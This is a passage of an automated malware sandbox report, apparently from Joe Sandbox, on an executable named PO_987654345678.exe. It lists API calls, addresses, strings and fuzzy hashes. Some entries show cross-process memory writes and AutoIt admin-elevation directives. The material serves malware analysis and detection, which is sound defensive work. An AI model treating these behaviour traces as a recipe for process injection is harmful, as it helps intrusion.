                           • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: 24dbda3e741235e269bfc7e0564d17614ef2753d02cd386f63acbccf53a68932
                          • Instruction ID: 927ff1f41e7ed17cafe294e2708c2c58320b4eff01b4944c580383c1411ed318
                          • Opcode Fuzzy Hash: 24dbda3e741235e269bfc7e0564d17614ef2753d02cd386f63acbccf53a68932
                          • Instruction Fuzzy Hash: 9CF01272945218AB8665EB68FEC6D1A7BEDBB44730F940845F048D7541C734FC80B6A4
                          APIs
                          • GetDlgItem.USER32(?,000003E9), ref: 00F65C58
                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 00F65C6F
                          • MessageBeep.USER32(00000000), ref: 00F65C87
                          • KillTimer.USER32(?,0000040A), ref: 00F65CA3
                          • EndDialog.USER32(?,00000001), ref: 00F65CBD
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                           • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                          • String ID:
                          • API String ID: 3741023627-0
                          • Opcode ID: 6a19f108ceff3963bd3b1bb865e018191342d5593d44a3130da94bbed1796e39
                          • Instruction ID: 4f61968e40ad0d69561d008edb557473bc1b5a73b6bdf22ba9daca7462b3bd89
                          • Opcode Fuzzy Hash: 6a19f108ceff3963bd3b1bb865e018191342d5593d44a3130da94bbed1796e39
                          • Instruction Fuzzy Hash: C1018171500B08AFEB305B60ED4EFA67BB8BB00F05F00055AA587B10E1DBF4A984AB90
                          APIs
                          • _free.LIBCMT ref: 00F322BE
                            • Part of subcall function 00F329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00F3D7D1,00000000,00000000,00000000,00000000,?,00F3D7F8,00000000,00000007,00000000,?,00F3DBF5,00000000), ref: 00F329DE
                            • Part of subcall function 00F329C8: GetLastError.KERNEL32(00000000,?,00F3D7D1,00000000,00000000,00000000,00000000,?,00F3D7F8,00000000,00000007,00000000,?,00F3DBF5,00000000,00000000), ref: 00F329F0
                          • _free.LIBCMT ref: 00F322D0
                          • _free.LIBCMT ref: 00F322E3
                          • _free.LIBCMT ref: 00F322F4
                          • _free.LIBCMT ref: 00F32305
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                           • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: 3c2dee3f0999b87c5644d536195eed8f8921b79036a22e1a2fdec2d9ea5c389b
                          • Instruction ID: 20ca3956d30c8f6c3e1b263c3a575f290c2c440248059f08cf4c4817663c5d13
                          • Opcode Fuzzy Hash: 3c2dee3f0999b87c5644d536195eed8f8921b79036a22e1a2fdec2d9ea5c389b
                          • Instruction Fuzzy Hash: CAF0DA758031389B8652AF78BD02A4E3B66F718771F15064BF414D72B1CB364952BBE4
                          APIs
                          • EndPath.GDI32(?), ref: 00F195D4
                          • StrokeAndFillPath.GDI32(?,?,00F571F7,00000000,?,?,?), ref: 00F195F0
                          • SelectObject.GDI32(?,00000000), ref: 00F19603
                          • DeleteObject.GDI32 ref: 00F19616
                          • StrokePath.GDI32(?), ref: 00F19631
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                           • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Path$ObjectStroke$DeleteFillSelect
                          • String ID:
                          • API String ID: 2625713937-0
                          • Opcode ID: db9811dd5bb11e15802bd08a336c9b3bf7846168dfb828f8afd506e422c20daf
                          • Instruction ID: f1afaabff416511f79b00a35a61e5319191286c60e4cc85892ff2c81f0be6526
                          • Opcode Fuzzy Hash: db9811dd5bb11e15802bd08a336c9b3bf7846168dfb828f8afd506e422c20daf
                          • Instruction Fuzzy Hash: 7BF0193140A20CEBDB165F75ED287A43B62BB00332F048216F525950F1CB708995FFA5
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                           • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: __freea$_free
                          • String ID: a/p$am/pm
                          • API String ID: 3432400110-3206640213
                          • Opcode ID: 30be6012c5a1334fbb464f98402d39db1a624a2fabde5d4a122be8765e1514a5
                          • Instruction ID: 22a54e21552f21530a6d80b49ed6cfc0668a1306466215896fe8389ad97686b2
                          • Opcode Fuzzy Hash: 30be6012c5a1334fbb464f98402d39db1a624a2fabde5d4a122be8765e1514a5
                          • Instruction Fuzzy Hash: 1DD12472D00206CADB289F68C895BFEB7B4FF06330F284159E901AB651D7759D80FBA1
                          APIs
                            • Part of subcall function 00F20242: EnterCriticalSection.KERNEL32(00FD070C,00FD1884,?,?,00F1198B,00FD2518,?,?,?,00F012F9,00000000), ref: 00F2024D
                            • Part of subcall function 00F20242: LeaveCriticalSection.KERNEL32(00FD070C,?,00F1198B,00FD2518,?,?,?,00F012F9,00000000), ref: 00F2028A
                            • Part of subcall function 00F09CB3: _wcslen.LIBCMT ref: 00F09CBD
                            • Part of subcall function 00F200A3: __onexit.LIBCMT ref: 00F200A9
                          • __Init_thread_footer.LIBCMT ref: 00F87BFB
                            • Part of subcall function 00F201F8: EnterCriticalSection.KERNEL32(00FD070C,?,?,00F18747,00FD2514), ref: 00F20202
                            • Part of subcall function 00F201F8: LeaveCriticalSection.KERNEL32(00FD070C,?,00F18747,00FD2514), ref: 00F20235
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                           • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                          • String ID: 5$G$Variable must be of type 'Object'.
                          • API String ID: 535116098-3733170431
                          • Opcode ID: 50c7b220732622f72866296ffb05f46c3f7bbaf0413f6ce8038e4899c3e28dd4
                          • Instruction ID: 83d4c9cf25fedb13db23fec01e687c167fe92fd24154d041a0624f6ea0d30026
                          • Opcode Fuzzy Hash: 50c7b220732622f72866296ffb05f46c3f7bbaf0413f6ce8038e4899c3e28dd4
                          • Instruction Fuzzy Hash: 8E917A71A04209EFCB04FF54D891AEDB7B2BF45314F248059F806AB292DB75EE41EB51
                          APIs
                            • Part of subcall function 00F6B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F621D0,?,?,00000034,00000800,?,00000034), ref: 00F6B42D
                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00F62760
                            • Part of subcall function 00F6B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F621FF,?,?,00000800,?,00001073,00000000,?,?), ref: 00F6B3F8
                            • Part of subcall function 00F6B32A: GetWindowThreadProcessId.USER32(?,?), ref: 00F6B355
                            • Part of subcall function 00F6B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00F62194,00000034,?,?,00001004,00000000,00000000), ref: 00F6B365
                            • Part of subcall function 00F6B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00F62194,00000034,?,?,00001004,00000000,00000000), ref: 00F6B37B
                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F627CD
                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F6281A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                          • String ID: @
                          • API String ID: 4150878124-2766056989
                          • Opcode ID: f9f508d9ea66f83e46553f62d2a6af35f92f11064eec82f887f269a0eedc4b80
                          • Instruction ID: 8792a18aafaa6ddc1d886cf4be2b4f5f91a8c2c80157cf4b74cbd8f44134e59f
                          • Opcode Fuzzy Hash: f9f508d9ea66f83e46553f62d2a6af35f92f11064eec82f887f269a0eedc4b80
                          • Instruction Fuzzy Hash: 51411C72900218AFDB10DFA4CD46EEEBBB8AF09710F108055FA55B7181DB746E85DBA1
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PO_987654345678.exe,00000104), ref: 00F31769
                          • _free.LIBCMT ref: 00F31834
                          • _free.LIBCMT ref: 00F3183E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: _free$FileModuleName
                          • String ID: C:\Users\user\Desktop\PO_987654345678.exe
                          • API String ID: 2506810119-2142151873
                          • Opcode ID: 02497e843fa84de144db822f97236c8b141230a91e616462b90e3f085af93a64
                          • Instruction ID: 469ff36d217a5b174d9304c5bcd9dfcccb38016b7abb241dcb9c84015d8b1e75
                          • Opcode Fuzzy Hash: 02497e843fa84de144db822f97236c8b141230a91e616462b90e3f085af93a64
                          • Instruction Fuzzy Hash: 1B316D75E01218BBDB21DB999C85D9EBBBCFB85330F1441A7E80497211D6758A40EBA4
                          APIs
                          • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00F6C306
                          • DeleteMenu.USER32(?,00000007,00000000), ref: 00F6C34C
                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00FD1990,01245730), ref: 00F6C395
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Menu$Delete$InfoItem
                          • String ID: 0
                          • API String ID: 135850232-4108050209
                          • Opcode ID: bf8b3439376d006fa71959973bd7ec2af2f17adf0d5d2f251ab2f052c9f8dfcd
                          • Instruction ID: ca874179619b8d068dba15f64ac03959d528e808be5b33c69fbf201279a266a2
                          • Opcode Fuzzy Hash: bf8b3439376d006fa71959973bd7ec2af2f17adf0d5d2f251ab2f052c9f8dfcd
                          • Instruction Fuzzy Hash: 0B418F316043019FD720DF25DC45B6ABBE8AB85320F14861EF9E5973D1D774E904EBA2
                          APIs
                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00F9CC08,00000000,?,?,?,?), ref: 00F944AA
                          • GetWindowLongW.USER32 ref: 00F944C7
                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00F944D7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Window$Long
                          • String ID: SysTreeView32
                          • API String ID: 847901565-1698111956
                          • Opcode ID: f5c2d0c821756f25d356042c4b42375ecdebdd6fb63458226ae0c9b713fcb4a5
                          • Instruction ID: 99c0cc7faf9d1260b871b8c9897e6c81336edcf69790788e98b61c3be7a0d9a9
                          • Opcode Fuzzy Hash: f5c2d0c821756f25d356042c4b42375ecdebdd6fb63458226ae0c9b713fcb4a5
                          • Instruction Fuzzy Hash: 1C319C32610209ABEF208F78DC45FEA7BA9EB18334F254715F979921D0D774EC51AB90
                          APIs
                            • Part of subcall function 00F8335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00F83077,?,?), ref: 00F83378
                          • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00F8307A
                          • _wcslen.LIBCMT ref: 00F8309B
                          • htons.WSOCK32(00000000,?,?,00000000), ref: 00F83106
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                          • String ID: 255.255.255.255
                          • API String ID: 946324512-2422070025
                          • Opcode ID: a76bece6d6795afbb1e53059c1f539fbe6ba9ccba91c449427ba7e3ae1b8e26d
                          • Instruction ID: 9a7932bec965eba47c25371b6465540cfba5750f039e635e42497b6309c6a6d4
                          • Opcode Fuzzy Hash: a76bece6d6795afbb1e53059c1f539fbe6ba9ccba91c449427ba7e3ae1b8e26d
                          • Instruction Fuzzy Hash: B031E735A04205DFCB10EF28C985EEA77E0EF14B28F248059E9168B3A2D775EE41E761
                          APIs
                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00F93F40
                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00F93F54
                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F93F78
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: MessageSend$Window
                          • String ID: SysMonthCal32
                          • API String ID: 2326795674-1439706946
                          • Opcode ID: 4618ac394ddf11fe710c0cf0a3cd70a77ca34f04d728811f308b2ae10f9b51e5
                          • Instruction ID: a1a64de799fa80b1c56479db9ecaa9f53fb0dae98a7f88fa4d3cfbe310c835a6
                          • Opcode Fuzzy Hash: 4618ac394ddf11fe710c0cf0a3cd70a77ca34f04d728811f308b2ae10f9b51e5
                          • Instruction Fuzzy Hash: 0D219F33A00219BBEF259F50CC46FEA3B75EB48728F110215FA196B1D0D6B5A950AB90
                          APIs
                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00F94705
                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00F94713
                          • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00F9471A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: MessageSend$DestroyWindow
                          • String ID: msctls_updown32
                          • API String ID: 4014797782-2298589950
                          • Opcode ID: e2e336248f22213538016a0c91e1b01020ce4faaf962d24b543191a886e110e2
                          • Instruction ID: d547907aa7a7cb7076b4fa4e0a47514ed20de325699d1d9912eeb836c03059e9
                          • Opcode Fuzzy Hash: e2e336248f22213538016a0c91e1b01020ce4faaf962d24b543191a886e110e2
                          • Instruction Fuzzy Hash: 172162B5600209AFEB10DF64DCD1DB737ADEB5A3A4B040059FA0097251DB30FC52EA61
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: _wcslen
                          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                          • API String ID: 176396367-2734436370
                          • Opcode ID: 3acd49c11c3553d762b80b0daf12a6594d3a37d8fc950c92f74aba01c895261b
                          • Instruction ID: 20113358385800e8c92712c4f2db54d45c71529ec238411b2be21a3e5c79cd27
                          • Opcode Fuzzy Hash: 3acd49c11c3553d762b80b0daf12a6594d3a37d8fc950c92f74aba01c895261b
                          • Instruction Fuzzy Hash: 0B21087260872166D731AA24DC02FB773DCDF91320F54402AF94AD7181EBFAAD46F295
                          APIs
                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00F93840
                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00F93850
                          • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00F93876
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: MessageSend$MoveWindow
                          • String ID: Listbox
                          • API String ID: 3315199576-2633736733
                          • Opcode ID: c853abdee2940065c3066801f0cdcf4ecb2e74cde38b146a4d8c475fc2e1abf9
                          • Instruction ID: cfe55cdfa6ac763a29e03e74eab9996a4ce88316292229a2279d85090da97577
                          • Opcode Fuzzy Hash: c853abdee2940065c3066801f0cdcf4ecb2e74cde38b146a4d8c475fc2e1abf9
                          • Instruction Fuzzy Hash: AA21C272A00218BBFF218F94CC45FBB376EEF89760F108114F9049B190C675DC52ABA0
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 00F74A08
                          • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00F74A5C
                          • SetErrorMode.KERNEL32(00000000,?,?,00F9CC08), ref: 00F74AD0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ErrorMode$InformationVolume
                          • String ID: %lu
                          • API String ID: 2507767853-685833217
                          • Opcode ID: 6a17d66936fa9e66c0a14f11d052db38cced9a01ef059da6fbcfe5c2fee5263c
                          • Instruction ID: 2c5c077c67dce81d970ece34ad1870cc53a0c3223ef778aed05b9c1e7032dd45
                          • Opcode Fuzzy Hash: 6a17d66936fa9e66c0a14f11d052db38cced9a01ef059da6fbcfe5c2fee5263c
                          • Instruction Fuzzy Hash: C4318275A00109AFDB10DF54C885EAA7BF8EF08318F1480A9F909DB352D775ED45EBA1
                          APIs
                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00F9424F
                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00F94264
                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00F94271
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID: msctls_trackbar32
                          • API String ID: 3850602802-1010561917
                          • Opcode ID: 6f6bcb338ef3ca7b68578461450b88c4e4ee3dfdc2ae5a35c6bf5e495b8086f8
                          • Instruction ID: 8de2b8e5b28ef5a530cb1fd83c8c95f326ebb5a12f0f1647ea7c11c42b5aa8d4
                          • Opcode Fuzzy Hash: 6f6bcb338ef3ca7b68578461450b88c4e4ee3dfdc2ae5a35c6bf5e495b8086f8
                          • Instruction Fuzzy Hash: B211E332640208BEFF205F29CC06FAB3BACEF95B64F110524FA55E2090D271E852AB20
                          APIs
                            • Part of subcall function 00F06B57: _wcslen.LIBCMT ref: 00F06B6A
                            • Part of subcall function 00F62DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00F62DC5
                            • Part of subcall function 00F62DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F62DD6
                            • Part of subcall function 00F62DA7: GetCurrentThreadId.KERNEL32 ref: 00F62DDD
                            • Part of subcall function 00F62DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00F62DE4
                          • GetFocus.USER32 ref: 00F62F78
                            • Part of subcall function 00F62DEE: GetParent.USER32(00000000), ref: 00F62DF9
                          • GetClassNameW.USER32(?,?,00000100), ref: 00F62FC3
                          • EnumChildWindows.USER32(?,00F6303B), ref: 00F62FEB
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
